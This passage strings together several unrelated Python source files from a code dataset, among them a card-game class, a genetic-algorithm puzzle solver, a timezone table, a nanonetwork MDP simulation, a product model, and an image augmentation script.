\ncap.release()\ncv2.destroyAllWindows()\n\n\n","sub_path":"Report/Code/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":6764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"263476660","text":"class Carta:\n def __init__(self, nombre, Tipo, CostosTot, CMon, CLad, CCem, COro, CMad, CCer, CPap, CTel, Gratis, EMon, ELad, ECem, EOro, EMad, ECer, EPap, ETel, EGeo, ERue, EEsc, EMil, EPto):\n self.Nombre = nombre\n self.Tipo = Tipo\n self.CTot = CostosTot\n self.Costos = {'Mon': CMon, 'Lad': CLad, 'Cem': CCem,\n 'Oro': COro, 'Mad': CMad, 'Cer': CCer,\n 'Pap': CPap, 'Tel': CTel}\n self.Gratis = Gratis\n self.Especialidad = {'Mon': EMon, 'Lad': ELad, 'Cem': ECem, 'Oro': EOro,\n 'Mad': EMad, 'Cer': ECer, 'Pap': EPap, 'Tel': ETel,\n 'Geo': EGeo, 'Rue': ERue, 'Esc': EEsc, 'Mil': EMil,\n 'Pto': EPto}\n\n def sePuedeJugar(self, recDisponibles, cartasAnteriores):\n if self.esGratis(cartasAnteriores):\n return True\n\n for i in recDisponibles:\n if (self.Costos[i] > recDisponibles[i]):\n return False\n\n return True\n\n def esGratis(self, cartasAnteriores):\n for unaCarta in cartasAnteriores:\n if (self.Gratis == unaCarta.Nombre):\n return True\n\n if (self.CTot == 0):\n return True\n return False\n\n def obetnerRecursosNecesarios(self, recNeces):\n for i in recNeces:\n recNeces[i] += self.Costos[i]\n\n def __lt__(self, other):\n if self.Tipo < other.Tipo:\n return True\n elif self.Tipo > other.Tipo:\n return False\n else:\n return self.ordenarSegunGratis(other)\n\n def entregaNecesario(self, recNeces):\n for recurso in recNeces:\n if (recNeces[recurso] != 0):\n if (self.Especialidad[recurso] >= recNeces[recurso]):\n return True\n return False\n\n def realizarEspecilidad(self, recNeces, recDisponibles):\n for recurso in recNeces:\n recDisponibles[recurso] += self.Especialidad[recurso]\n recNeces[recurso] -= self.Especialidad[recurso]\n if recNeces[recurso] < 0:\n recNeces[recurso] = 0\n recDisponibles['Mon'] -= self.Costos['Mon']\n\n def ordenarSegunGratis(self, other):\n if (self.Gratis != 0) and (other.Gratis == 0):\n return True\n elif (self.Gratis == 0) and (other.Gratis != 0):\n return False\n else:\n return self.ordenarCantidadCostos(other)\n\n def ordenarCantidadCostos(self, other):\n if self.CTot < other.CTot:\n return True\n elif self.CTot > other.CTot:\n return False\n else:\n return self.ordenarPorNombre(other)\n\n def ordenarPorNombre(self, other):\n return self.Nombre < other.Nombre\n","sub_path":"Heuristica/modelo/carta.py","file_name":"carta.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"284854341","text":"from __future__ import print_function\nfrom operator import attrgetter\nfrom gaps import image_helpers\nfrom gaps.selection import roulette_selection\nfrom gaps.crossover import Crossover\nfrom gaps.individual import Individual\nfrom gaps.image_analysis import ImageAnalysis\nfrom gaps.plot import Plot\nfrom gaps.progress_bar import print_progress\nimport cv2\n\n\nclass GeneticAlgorithm(object):\n TERMINATION_THRESHOLD = 20\n\n # 构造方法: 以下划线开头的是类的内部方法,一般不会被手动调用\n def __init__(self, image, piece_size, population_size, generations, elite_size=2,\n position_file=\"image_position.txt\"):\n # 初始化种群: 代数,人口 TODO\n self._image = image\n self._piece_size = piece_size\n self._generations = generations\n self._elite_size = elite_size\n pieces, rows, columns = image_helpers.flatten_image(image, piece_size, indexed=True, position_file=position_file)\n # 循环population_size次,每次都将Individual方法调用返回的对象加入到list中\n\n self._population = [Individual(pieces, rows, columns) for _ in range(population_size)]\n self._pieces = pieces\n\n # 每个类的方法的第一个参数都是self\n def start_evolution(self, verbose):\n print(\"=== Pieces: {}\\n\".format(len(self._pieces)))\n\n if verbose:\n plot = Plot(self._image)\n\n ImageAnalysis.analyze_image(self._pieces)\n\n fittest = None\n best_fitness_score = float(\"-inf\")\n termination_counter = 0\n\n for generation in range(self._generations):\n print_progress(generation, self._generations - 1, prefix=\"=== Solving puzzle: \")\n\n new_population = []\n\n # Elitism\n # 取适应度最高的两个图片\n elite = self._get_elite_individuals(elites=self._elite_size)\n new_population.extend(elite)\n\n # 从种群中随机选择popultation - elite_size个父母\n selected_parents = roulette_selection(self._population, elites=self._elite_size)\n\n # 通过父母生成子代,加入到new_population中\n for first_parent, second_parent in selected_parents:\n # 交叉互换���生成子代\n crossover = Crossover(first_parent, second_parent)\n crossover.run()\n child = crossover.child()\n # child.mutate()\n new_population.append(child)\n\n # 从上一代中选出适应度最高的一个\n fittest = self._best_individual()\n\n fittest.mutate()\n\n # min_fitness = 0\n # for index in range(len(new_population)):\n # if new_population[index].fitness < new_population[min_fitness].fitness:\n # min_fitness = index\n # fittest.clear_fitness()\n # if fittest.fitness > new_population[min_fitness].fitness:\n # new_population[min_fitness] = fittest\n\n print(\"old_fittest : \", fittest.fitness, end=\"\")\n\n # image = fittest.to_image()\n # rightImage = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n # cv2.imwrite(\"temp_image_\" + str(generation) + \".jpg\", rightImage)\n best_adjoin = fittest.best_adjoin(self._piece_size)\n rightImage = cv2.cvtColor(best_adjoin, cv2.COLOR_RGB2BGR)\n cv2.imwrite(\"temp_image_best_adjoin_\" + str(generation) + \".jpg\", rightImage)\n # penalisze = fittest.penalize()\n # print(\" new_fittest : \", fittest.fitness)\n # rightImage = cv2.cvtColor(penalize, cv2.COLOR_RGB2BGR)\n # cv2.imwrite(\"temp_image_penalize_\" + str(generation) + \".jpg\", rightImage)\n\n # 如果上一代最佳比历史最佳好,则termination_counter += 1,否则替换\n if fittest.fitness < best_fitness_score:\n termination_counter += 1\n else:\n best_fitness_score = fittest.fitness\n termination_counter = 0\n\n if termination_counter % 4 == 2:\n predicate = Individual(fittest.pieces, fittest.rows, fittest.columns, shuffle=False)\n predicate.penalize_image = fittest.penalize_image\n # 处理局部最优\n predicate.manually_select()\n # predicate.shuffle_assembling()\n print(\"predicate_fitness : %s \" % str(predicate.fitness))\n image = predicate.to_image()\n rightImage = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n cv2.imwrite(\"predicate_image_\" + str(generation) + \".jpg\", rightImage)\n for index in range(len(new_population)):\n if new_population[index].fitness < predicate.fitness:\n new_population[index] = predicate\n break\n\n # 如果连续十代都没有更优子代,则退出\n if termination_counter == self.TERMINATION_THRESHOLD:\n print(\"\\n\\n=== GA terminated\")\n print(\"=== There was no improvement for {} generations\".format(self.TERMINATION_THRESHOLD))\n return fittest\n\n self._population = new_population\n\n if verbose:\n plot.show_fittest(fittest.to_image(), \"Generation: {} / {}\".format(generation + 1, self._generations))\n\n return fittest\n\n def _get_elite_individuals(self, elites):\n \"\"\"Returns first 'elite_count' fittest individuals from population\"\"\"\n # 适应度在这里被attrgetter调用,会计算适应度并排序\n return sorted(self._population, key=attrgetter(\"fitness\"))[-elites:]\n\n def _best_individual(self):\n \"\"\"Returns the fittest individual from population\"\"\"\n return max(self._population, key=attrgetter(\"fitness\"))\n","sub_path":"gaps/genetic_algorithm.py","file_name":"genetic_algorithm.py","file_ext":"py","file_size_in_byte":5861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"278590860","text":"from datetime import datetime\nfrom datetime import timedelta\nfrom typing import Tuple\n\nimport pytz\nfrom rich.table import Table\n\nfrom timezone_converter.helper import Helper\n\n\nclass ComparisonView(Helper):\n def __init__(self, timezone: str, zone: bool) -> None:\n self.timezone = timezone\n self.zone = zone\n self.timezone_name = self._get_timezone_name(self.timezone)\n self.current_dt = datetime.now()\n self.local_midnight = datetime(\n self.current_dt.year,\n self.current_dt.month,\n self.current_dt.day,\n ).astimezone()\n self.foreign_midnight = self.local_midnight.astimezone(\n pytz.timezone(self.timezone_name),\n )\n\n def _get_timezone_name(self, timezone: str) -> str:\n timezone_name = self.timezone_translations.get(timezone.lower())\n if timezone_name is None:\n raise SystemExit(f'error: {timezone !r} is not an available timezone')\n return timezone_name\n\n def _get_headers(self) -> Tuple[str, str]:\n local_header = 'LOCAL'\n foreign_header = str(self.foreign_midnight.tzinfo).upper()\n\n if self.zone:\n local_header += f' ({self.local_midnight.tzname()})'\n foreign_header += f' ({self.foreign_midnight.tzname()})'\n\n return local_header, foreign_header\n\n def _build_table(self) -> Table:\n local_header, foreign_header = self._get_headers()\n table = Table()\n table.add_column(local_header, justify='center')\n table.add_column(foreign_header, justify='center')\n\n fmt = '%Y-%m-%d %H:%M'\n for hour in range(24):\n table.add_row(\n (self.local_midnight + timedelta(hours=hour)).strftime(fmt),\n (self.foreign_midnight + timedelta(hours=hour)).strftime(fmt),\n )\n\n return table\n\n def print_table(self) -> int:\n self._print_with_rich(self._build_table())\n return 0\n","sub_path":"timezone_converter/comparison_view.py","file_name":"comparison_view.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"294447023","text":"import os\nimport pickle\nimport platform\nimport random\nimport warnings\nfrom concurrent.futures import ProcessPoolExecutor\nfrom functools import partial\nfrom itertools import repeat\n\nimport mdptoolbox\nimport simpy\nfrom scipy.stats import uniform\n\nfrom always_store_policy import AlwaysStorePolicy\nfrom conservative_storing_policy import ConservativeStoringPolicy\nfrom gateway import Gateway\nfrom high_harvesting_policy import HighHarvestingPolicy\nfrom mdp_policy import MDP_policy\nfrom neutral_storing_policy import NeutralStoringPolicy\nfrom only_store_high_priority_policy import OnlyStoreHighPriorityPolicy\nfrom random_policy import RandomPolicy\nfrom tree_policy import treePolicy\n\n\"\"\" backup\nfrom always_store_policy import AlwaysStorePolicy\nfrom only_store_high_priority_policy import OnlyStoreHighPriorityPolicy\nfrom random_policy import RandomPolicy\nfrom high_harvesting_policy import HighHarvestingPolicy\nfrom conservative_storing_policy import ConservativeStoringPolicy\nfrom neutral_storing_policy import NeutralStoringPolicy\n\"\"\"\n\nfrom nano_parameters import *\nfrom node import Node, VeinMobility, fixed_movement\nfrom os import path\n\nif platform.node() == \"alioth\":\n print('Alioth config')\n WORKERS = 35\n NUM_NODES = 30\n RUNS = max(WORKERS, 200)\n print(\"{} WORKERS, {} NODOS, {} RUNS\".format(WORKERS, NUM_NODES, RUNS))\nelse:\n print('Laptop config')\n WORKERS = 1 # 8\n NUM_NODES = 10 # 10\n RUNS = max(WORKERS, 1) # 50)\n print(\"{} WORKERS, {} NODOS, {} RUNS\".format(WORKERS, NUM_NODES, RUNS))\n\n\ndef compute_reward(params, policy_name):\n policy_array, num_nodes, seed = params\n\n random.seed(seed)\n np.random.seed(seed)\n sim_time = 100 # 10 secs // 1 hour\n num_updates = 2\n chunk = int(sim_time / num_updates)\n progress = 0\n debug = False\n vein_height = 0.8e-3 # in meters\n body_length = 15 # in meters\n constant_movement = fixed_movement(vNodo)\n vein_mobility = VeinMobility(\n constant_movement, # x axis movement description\n uniform(-vNodo, vNodo * 2), # y axis movement description\n (0, body_length, True), # x axis bounds [inf lim, sup lim, circular?]\n (0, vein_height, False) # y axis bounds [inf lim, sup lim, circular?]\n )\n\n min_initial_pos_x = 0\n max_initial_pos_x = 5e-3\n min_initial_pos_y = 0\n max_initial_pos_y = vein_height\n\n if policy_name == \"MDP\":\n policy = MDP_policy(policy_array) # 2760.0\n elif policy_name == \"AS\":\n policy = AlwaysStorePolicy() # 2146.181818181818\n elif policy_name == \"OSHP\":\n policy = OnlyStoreHighPriorityPolicy()\n elif policy_name == \"RP\":\n policy = RandomPolicy(drop_prob=0.5)\n elif policy_name == \"HHP\":\n policy = HighHarvestingPolicy(x_max)\n elif policy_name == \"CSP\":\n average_energy_harvesting = int(round(getEnergyHarvestingRates().mean()))\n average_energy_drop_while_storing = average_energy_harvesting - ram_consumption\n policy = ConservativeStoringPolicy(distance_accountable_max, average_energy_drop_while_storing,\n transmit_consumption)\n elif policy_name == \"NSP\":\n average_energy_harvesting = int(round(getEnergyHarvestingRates().mean()))\n average_energy_drop_while_storing = average_energy_harvesting - ram_consumption\n policy = NeutralStoringPolicy(int(round(distance_accountable_max / 2)), average_energy_drop_while_storing,\n transmit_consumption)\n elif policy_name == \"TP\":\n policy = treePolicy(policy_array, 80, x_max, y_max, z_max)\n else:\n raise Exception(\"Invalid policy name: \" + str(policy_name))\n\n env = simpy.Environment()\n # policy = pickle.load(open('/home/ruben/mdp-ram.p', 'rb'))\n harvesting_rates = getEnergyHarvestingRates()\n\n gateways = list()\n x = 0\n while x < body_length:\n x += (gateway_distance_max - gateway_distance_min) * np.random.random() + gateway_distance_min\n g = Gateway(x, 0, gateway_coverage, env, debug)\n gateways.append(g)\n\n max_covered_dist = min(sim_time * vNodo + max_initial_pos_x, body_length)\n checker_gateway = [-1] * int(np.ceil(max_covered_dist / deltaS))\n\n x_q = 0\n x_i = 0\n while x_q < max_covered_dist:\n\n in_coverage = None\n for g_i, g in enumerate(gateways):\n if g.in_coverage(x_q, 0):\n in_coverage = g_i\n break\n if in_coverage is not None:\n checker_gateway[x_i] = g_i\n\n x_i += 1\n x_q += deltaS\n\n checker_gateway = [-1] + [max(checker_gateway[i - 1], checker_gateway[i], checker_gateway[i + 1]) for i in\n range(1, len(checker_gateway) - 1)] + [-1]\n\n nodes = list()\n\n start = list()\n for n in range(num_nodes):\n x0 = (max_initial_pos_x - min_initial_pos_x) * np.random.random() + min_initial_pos_x\n y0 = (max_initial_pos_y - min_initial_pos_y) * np.random.random() + min_initial_pos_y\n t0 = np.random.random() * 0.1 # from 0 to 0.1 secs\n # t0 = (n + 1) * 1e-6\n start.append(t0)\n n = Node(n, x0, y0, vein_mobility, deltaT, policy, harvesting_rates, gateways, env, transmit_consumption,\n ram_consumption, energy_quantum_storable_max, distance_accountable_max, gen_prob, packet_length, x_max,\n y_max, z_max, checker_gateway, debug)\n nodes.append(n)\n\n for n_starting in np.argsort(start):\n next_starting_time = start[n_starting]\n env.run(until=next_starting_time)\n env.process(nodes[n_starting].run())\n\n for i in range(num_updates):\n progress += chunk\n env.run(until=progress)\n print(\"Progress: {} out of {}\".format(progress, sim_time))\n\n tot_r = 0\n for g in gateways:\n tot_r += g.reward\n\n if debug:\n print('Total reward: {}\\nMean reward: {}'.format(tot_r, tot_r / num_nodes))\n\n return tot_r\n\n\n# def get_state(battery, packet, distance):\n# return int(battery * y_max * z_max + packet * z_max + distance)\n\ndef simulate_MDP():\n\n policy = pickle.load(open(\"./Policies 097 002 001 mean/33.0-17.0-infinite.p\", \"rb\"))\n # policy = np.zeros((len(pi.policy), 3))\n # policy[np.arange(len(pi.policy)), np.array(pi.policy)] = 1\n # policy = pi.policy\n policy_unravelled = np.array(policy).reshape((x_max, y_max, z_max))\n\n uniform_cdf = [uniform.cdf(x, gateway_distance_min_q, max(gateway_distance_max_q - gateway_distance_min_q, 0.001))\n for x in range(z_max)]\n harvesting_rates = getEnergyHarvestingRates()\n\n # 8333.3333\n battery = 0\n distance = 0\n packet = 0\n\n tot_rewards = []\n max_time = int(100 / deltaT)\n for _ in range(100):\n reward = 0\n\n for it in range(max_time):\n action = policy_unravelled[battery, packet, distance] # pi.policy[get_state(battery, packet, distance)]\n\n if np.random.random() <= uniform_cdf[distance]:\n distance = 0\n else:\n distance = (distance + 1) % z_max\n\n if action == 0:\n battery = int(np.clip(battery + harvesting_rates[battery], 0, energy_quantum_storable_max))\n elif action == 1:\n battery = int(np.clip(battery + harvesting_rates[battery] - ram_consumption, 0, energy_quantum_storable_max))\n else:\n battery = int(np.clip(battery + harvesting_rates[battery] - transmit_consumption[packet], 0, energy_quantum_storable_max))\n\n reward += (packet_length[packet] * packets_priorities[packet]) * (action == 2)\n\n if action != 1:\n packet = np.random.choice(3, p=gen_prob)\n\n tot_rewards.append(reward)\n\n print(np.mean(tot_rewards))\n exit(-1)\n print(\"ok\")\n\n\ndef sweep_values():\n global gateway_distance_max, gateway_distance_min, gateway_distance_max_q, gateway_distance_min_q, distance_accountable_max, z_max, num_states, gen_prob\n\n rewards = list()\n\n policy_name = \"MDP\" # MDP, AS, OSHP, RP, HHP, CSP, NSP, TP\n print(\"Running policy\", policy_name)\n steps = 1\n # simulate_MDP()\n\n probs_lambda_0 = np.round(np.linspace(0.99, 0.8, 11), 3)\n gateway_distance_min = 0.05\n gateway_distance_max = 0.05\n\n gateway_distance_max_q = round(gateway_distance_max / deltaS) # in deltaS\n gateway_distance_min_q = round(gateway_distance_min / deltaS) # in deltaS\n distance_accountable_max = round(gateway_distance_max / deltaS)\n z_max = int(distance_accountable_max + 1)\n num_states = x_max * y_max * z_max\n\n with open(\"out_{}.txt\".format(policy_name), \"a+\") as file:\n for i, prob_lambda_0 in enumerate(probs_lambda_0):\n # gen_prob = np.array([0.97, 0.02, 0.01])\n gen_prob[0] = prob_lambda_0\n gen_prob[2] = (1 - prob_lambda_0) / 3\n gen_prob[1] = 2 * gen_prob[2]\n\n assert abs(gen_prob.sum() - 1) < 1e-4\n\n assert (gateway_distance_max - gateway_distance_min) > -1e-5\n if gateway_distance_max < gateway_distance_min:\n gateway_distance_max = gateway_distance_min\n print('Correcting small distances')\n\n infinite = True\n if infinite:\n path_file = \"{}-infinite.p\".format(prob_lambda_0)\n else:\n path_file = \"{}.p\".format(prob_lambda_0)\n\n if path.isfile(path_file):\n warnings.warn('Cargando la politica desde el HDD')\n policy = pickle.load(open(path_file, 'rb'))\n else:\n policy = re_compute_policy(path_file, infinite)\n\n seeds = np.arange(i * RUNS, (i + 1) * RUNS)\n\n policy_unravelled = np.array(policy).reshape((x_max, y_max, z_max))\n # exit(0)\n continue\n\n compute_reward_fixed = partial(compute_reward, policy_name=policy_name)\n\n if WORKERS > 1:\n with ProcessPoolExecutor(max_workers=WORKERS) as executor:\n p = executor.map(compute_reward_fixed, zip(repeat(policy), repeat(NUM_NODES), seeds))\n reward_list = np.array(list(p))\n else:\n reward_list = list()\n for j in range(RUNS):\n reward_list.append(compute_reward_fixed([policy, NUM_NODES, seeds[j]]))\n\n mean_r = np.mean(reward_list)\n std_r = np.std(reward_list)\n rewards.append((mean_r, std_r))\n\n print('Reward {} para pos = {} -> mean: {}, std: {}'.format(policy_name, prob_lambda_0, mean_r, std_r))\n file.write('Reward {} para pos = {} -> mean: {}, std: {}\\n'.format(policy_name, prob_lambda_0, mean_r, std_r))\n exit()\n file.flush()\n os.fsync(file.fileno())\n # print(reward_list)\n\n pickle.dump(rewards, open('rewards-{}.p'.format(policy_name), 'wb'))\n\n\ndef re_compute_policy(path_file, infinite=False):\n uniform_cdf = [uniform.cdf(x, gateway_distance_min_q - 1, max(gateway_distance_max_q -\n gateway_distance_min_q, 0.001)) for x in range(z_max)]\n\n assert gen_prob.sum() - 1 < 1e-10\n print('Computing policy for Lambda = {}'.format(gen_prob))\n\n T = np.zeros((num_actions, num_states, num_states)) # A x S x S'\n R = np.zeros((num_states, num_actions)) # S x A\n\n harvesting_rates = getEnergyHarvestingRates()\n\n for x in range(x_max):\n for y in range(y_max):\n for z in range(z_max):\n state = x * y_max * z_max + y * z_max + z\n harvest_rate = harvesting_rates[x]\n\n # x_c = state // (y_max * z_max)\n # y_c = (state - (x_c * y_max * z_max)) // z_max\n # z_c = state - (x_c * y_max * z_max) - (y_c * z_max)\n #\n # assert x_c == x and y_c == y and z_c == z\n\n # action drop it\n new_energy_value = min(x + harvest_rate, energy_quantum_storable_max)\n for y_alt in range(3):\n z_plus_one = min(z + 1, distance_accountable_max)\n z_gateway = 0\n\n state_p_no_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_plus_one)\n state_p_yes_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_gateway)\n\n T[0, state, state_p_no_gateway] = (1 - uniform_cdf[z]) * gen_prob[y_alt]\n T[0, state, state_p_yes_gateway] = (uniform_cdf[z]) * gen_prob[y_alt]\n\n # action keep it\n if y != 0 and x >= ram_consumption: # packet stored in buffer, can still keep it\n # don't move in the y-axis since we are keeping the packet\n new_energy_value = max(min(x + harvest_rate - ram_consumption, energy_quantum_storable_max), 0)\n\n z_plus_one = min(z + 1, distance_accountable_max)\n z_gateway = 0\n\n state_p_no_gateway = int(new_energy_value * y_max * z_max + y * z_max + z_plus_one)\n state_p_yes_gateway = int(new_energy_value * y_max * z_max + y * z_max + z_gateway)\n\n T[1, state, state_p_no_gateway] = (1 - uniform_cdf[z]) * 1\n T[1, state, state_p_yes_gateway] = (uniform_cdf[z]) * 1\n else: #\n # dont have enough energy to keep the packet in the buffer, drop it and maybe, generate another\n # however, we model the ram_consumption to penalize trying to keep it\n new_energy_value = max(min(x + harvest_rate - ram_consumption, energy_quantum_storable_max), 0)\n\n for y_alt in range(3):\n z_plus_one = min(z + 1, distance_accountable_max)\n z_gateway = 0\n\n state_p_no_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_plus_one)\n state_p_yes_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_gateway)\n\n T[1, state, state_p_no_gateway] = (1 - uniform_cdf[z]) * gen_prob[y_alt]\n T[1, state, state_p_yes_gateway] = (uniform_cdf[z]) * gen_prob[y_alt]\n\n # action transmit it\n # if y != 0 and z == 0 and x >= transmit_consumption[y]:\n if y != 0 and z < gateway_coverage_markov and x >= transmit_consumption[y]:\n # packet stored in buffer, i am in a gateway coverage, and have enough energy to transmit it:\n # let's transmit it!\n new_energy_value = max(min(x + harvest_rate - transmit_consumption[y], energy_quantum_storable_max),\n 0)\n for y_alt in range(3):\n z_plus_one = min(z + 1, distance_accountable_max)\n z_gateway = 0\n\n state_p_no_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_plus_one)\n state_p_yes_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_gateway)\n\n T[2, state, state_p_no_gateway] = (1 - uniform_cdf[z]) * gen_prob[y_alt]\n T[2, state, state_p_yes_gateway] = (uniform_cdf[z]) * gen_prob[y_alt]\n else: # trying to transmit but unable to do so\n # however, model the consumption derived from the transmision to penalize it\n new_energy_value = max(min(x + harvest_rate - transmit_consumption[y], energy_quantum_storable_max),\n 0)\n\n for y_alt in range(3):\n z_plus_one = min(z + 1, distance_accountable_max)\n z_gateway = 0\n\n state_p_no_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_plus_one)\n state_p_yes_gateway = int(new_energy_value * y_max * z_max + y_alt * z_max + z_gateway)\n\n T[2, state, state_p_no_gateway] = (1 - uniform_cdf[z]) * gen_prob[y_alt]\n T[2, state, state_p_yes_gateway] = (uniform_cdf[z]) * gen_prob[y_alt]\n\n assert np.allclose(T.sum(axis=2), 1, rtol=1e-7)\n assert len(np.where(T < 0)[0]) == 0, 'This should not happen'\n\n for x in range(x_max):\n for y in range(1, y_max): # if y == 0 -> R = 0, regardless of the action\n z = 0 # can only transmit if we are within a gateway range\n\n if x < transmit_consumption[y]: # can only transmit if enough charge is available\n continue\n\n state = x * y_max * z_max + y * z_max + z\n\n reward = packet_length[y] * packets_priorities[y]\n R[state, 2] = reward\n\n\n if infinite:\n pi = mdptoolbox.mdp.RelativeValueIteration(T, R, epsilon=0.005, max_iter=5000)\n pi.run()\n pickle.dump(pi.policy, open(path_file, 'wb'))\n print('finished computing infinite Pi')\n else:\n pi = mdptoolbox.mdp.ValueIteration(T, R, dr)\n pi.run()\n pickle.dump(pi.policy, open(path_file, 'wb'))\n print('finished computing discounted Pi')\n\n return pi.policy\n\n\nif __name__ == '__main__':\n sweep_values()\n","sub_path":"network-probability-sweep.py","file_name":"network-probability-sweep.py","file_ext":"py","file_size_in_byte":17326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"249055102","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = \"Vinícius Madureira\"\n__copyright__ = \"Copyright 2020, Vinícius Madureira\"\n__license__ = \"Creative Commons Zero 1.0 Universal\"\n__version__ = \"0.01a\"\n__maintainer__ = \"Vinícius Madureira\"\n__email__ = \"viniciusmadureira@outlook.com\"\n__status__ = \"Testing\"\n\nfrom model.category import Category\nimport re\n\n\"\"\"\nProduct class: Model for Product type objects.\nEach product contains a name (str), a description (str) and a value (float).\n\"\"\"\nclass Product:\n\n def __init__(self, name: str = \"\", description: str = \"\", value: float = None, category: Category = None, picture: str=\"\"):\n self.__name = name\n self.__description = description\n self.__value = value\n self.__category = category\n self.__picture = picture\n\n @property\n def name(self):\n return self.__name\n\n @name.setter\n def name(self, name):\n self.__name = None\n try:\n name = str(name).strip()\n if (re.search(r\"^[\\w]{2,}(\\s[\\d\\w\\-,;\\+]+)*$\", name, re.UNICODE) and len(name) <= 100):\n self.__name = name\n except:\n pass\n\n @property\n def description(self):\n return self.__description\n\n @description.setter\n def description(self, description):\n self.__description = None\n try:\n description = str(description).strip()\n if (2 <= len(description) <= 400):\n self.__description = description\n except:\n pass\n \n @property\n def value(self):\n return self.__value\n\n @value.setter\n def value(self, value):\n self.__value = None\n try:\n if not isinstance(value, float):\n value = float(re.search(r\"\\d+(\\.\\d+)?\", str(value).replace(\",\", \".\").strip())[0])\n if value >= 0.0: \n self.__value = int(value * 10**3) / 10**3 \n except:\n pass\n\n @property\n def category(self):\n return self.__category\n\n @category.setter\n def category(self, category: Category):\n self.__category = None\n if category.isValid():\n self.__category = category\n\n @property\n def picture(self):\n return self.__picture\n\n @picture.setter\n def picture(self, picture: str):\n self.__picture = None\n if re.search(r\"^\\w{1,96}\\.(png|jpg|gif)$\", picture, re.UNICODE):\n self.__picture = picture\n\n def isValid(self):\n return self.__name != None and self.__value != None and self.__category != None\n","sub_path":"vgrocery/model/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"623831701","text":"# Day_03_07_augmentation.py\nimport Augmentor\n\n\ndef usage_1():\n p = Augmentor.Pipeline('cifar10_mini')\n\n p.rotate(probability=0.7,\n max_left_rotation=10,\n max_right_rotation=10)\n p.zoom(probability=0.5,\n min_factor=1.1,\n max_factor=1.5)\n\n p.sample(3)\n\n\ndef usage_2():\n p = Augmentor.Pipeline('cifar10_mini')\n\n p.resize(probability=1, width=120, height=120)\n p.random_distortion(probability=1,\n grid_width=4,\n grid_height=4,\n magnitude=2)\n\n p.sample(3)\n\n\n# usage_1()\nusage_2()\n\n\n\n\n","sub_path":"ncia_cnn/Day_03_07_augmentation.py","file_name":"Day_03_07_augmentation.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"546224194","text":"\"\"\"\nRuns experimental analaysis of query timing strategies in a complicated domain\n\"\"\"\nimport context\nimport random\nfrom src.environment import ToolFetchingEnvironment\nimport numpy as np\nfrom src.agents.agent import RandomWorkerPolicy\nfrom src.agents.agent import PlanPolicy\nfrom src.agents.agent_adhoc_q import FetcherQueryPolicy\nfrom src.agents.agent_adhoc_q import FetcherAltPolicy\nfrom src.agents.agent_adhoc_q import never_query\nfrom itertools import permutations\nimport pandas as pd\nimport json\nimport argparse\nfrom time import sleep\n\ndef query_beginning(obs, agent):\n w_pos, f_pos, s_pos, t_pos, f_tool, w_action, f_action, answer = obs\n if np.max(agent.probs) >= 1:\n return None\n goals = [g for g,p in enumerate(agent.probs) if p > 0]\n return np.random.choice(goals,size=len(goals)//2, replace=False)\n\ndef query_ZQ(obs, agent):\n w_pos, f_pos, s_pos, t_pos, f_tool, w_action, f_action, answer = obs\n if np.max(agent.probs) >= 1:\n return None\n if np.array_equal(t_pos[0], f_pos):\n goals = [g for g,p in enumerate(agent.probs) if p > 0]\n return np.random.choice(goals,size=len(goals)//2, replace=False)\n return None\n\nrand_time = -1\ntime = 0\ndef query_random(obs, agent):\n w_pos, f_pos, s_pos, t_pos, f_tool, w_action, f_action, answer = obs\n if np.max(agent.probs) >= 1:\n return None\n if time >= rand_time:\n goals = [g for g,p in enumerate(agent.probs) if p > 0]\n return np.random.choice(goals,size=len(goals)//2, replace=False)\n return None\n\nstrats = {'X': never_query, 'First': query_beginning, 'ZQ': query_ZQ, 'Random': query_random}\n\n\ndef experiment(args):\n global time\n global rand_time\n results = {}\n results['graph 1'] = {}\n def rand_path_perm(stn_pos, worker_pos):\n worker_path = []\n offset = stn_pos-worker_pos\n\n if offset[0] >= 0:\n worker_path += [ToolFetchingEnvironment.WORKER_ACTIONS.RIGHT] * offset[0]\n else:\n worker_path += [ToolFetchingEnvironment.WORKER_ACTIONS.LEFT] * -offset[0]\n\n if offset[1] >= 0:\n worker_path += [ToolFetchingEnvironment.WORKER_ACTIONS.UP] * offset[1]\n else:\n worker_path += [ToolFetchingEnvironment.WORKER_ACTIONS.DOWN] * -offset[1]\n\n random.shuffle(worker_path)\n return worker_path\n def dist(p1, p2):\n return abs(p1[0]-p2[0]) + abs(p1[1]-p2[1])\n for strat in strats:\n results['graph 1'][strat] = []\n results['graph 1']['baseline'] = []\n for t in range(args.num_exp):\n if args.cluster_stations:\n num_clusters = args.num_stations//4\n cluster_pos = [(i,j) for i in range(args.grid_size//2) for j in range(args.grid_size//2)]\n cluster_pos = random.sample(cluster_pos, num_clusters)\n stations_pos = np.array([k for i,j in cluster_pos for k in [(2*i,2*j), (2*i+1, 2*j), (2*i, 2*j+1), (2*i+1, 2*j+1)]])\n else:\n stations_pos = [(i,j) for i in range(args.grid_size) for j in range(args.grid_size)]\n stations_pos = np.array(random.sample(stations_pos, args.num_stations))\n pos = [(i,j) for i in range(args.grid_size) for j in range(args.grid_size)]\n tool_pos = np.array(random.choice(pos))\n tools_pos = np.array([tool_pos for _ 